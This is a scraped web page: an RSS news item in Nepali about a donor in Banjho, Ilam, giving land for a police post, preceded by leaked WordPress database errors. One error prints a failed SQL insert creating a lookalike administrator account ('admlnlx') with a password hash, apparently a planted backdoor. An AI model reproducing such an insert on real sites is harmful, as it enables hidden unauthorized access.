WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEfnaO3pcf.7Jdh7mDyrtYNtTFf1mC0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-03 08:14:21', '', 'admlnlx', 'admlnlx')
WordPress database error: [Disk full (/tmp/#sql-temptable-49a-80d2e9-4128.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")]SHOW FULL COLUMNS FROM `gi_postmeta`
इलाम,पुस ८ –
इलाम बाँझोका एक समाजसेवीले प्रहरी चौकीको भवन निर्माणका लागि करिब तीनलाख रूपैयाँ पर्ने एक रोपनी जग्गा दान दिनुभएको छ ।
बाँझो–५ का रत्नकुमार राईले प्रहरी चौकीको भवन निर्माणका लागि सो जग्गा दान दिनुभएको जिल्ला प्रहरी कार्यालय इलामका प्रहरी उपरीक्षक सुशीलकुमार यादवले जानकारी दिनुभयो ।
त्यस्तै, सोही स्थानमा पर्ने दुई रोपनी जग्गा स्थानीयवासीले आर्थिक सङ्कलन गरेर खरिद गरी चौकीलाई उपलब्ध गराएका छन् । स्थानीयवासीले स्थानीयस्तरमा आर्थिक सङ्कलन गरेर जग्गा खरिद गरेका हुन् ।
दुवै जग्गाको धनीपुर्जा बिहीबार रत्नकुमार राईले प्रहरी उपरीक्षक यादवलाई हस्तान्तरण गर्नुभयो । यसअघि सोही स्थानमा चौकी भएपनि आफ्नै भवन नहुँदा प्रहरीलाई आवासको समस्या रहेको जिल्ला प्रहरी कार्यालयले जनाएको छ । – रासस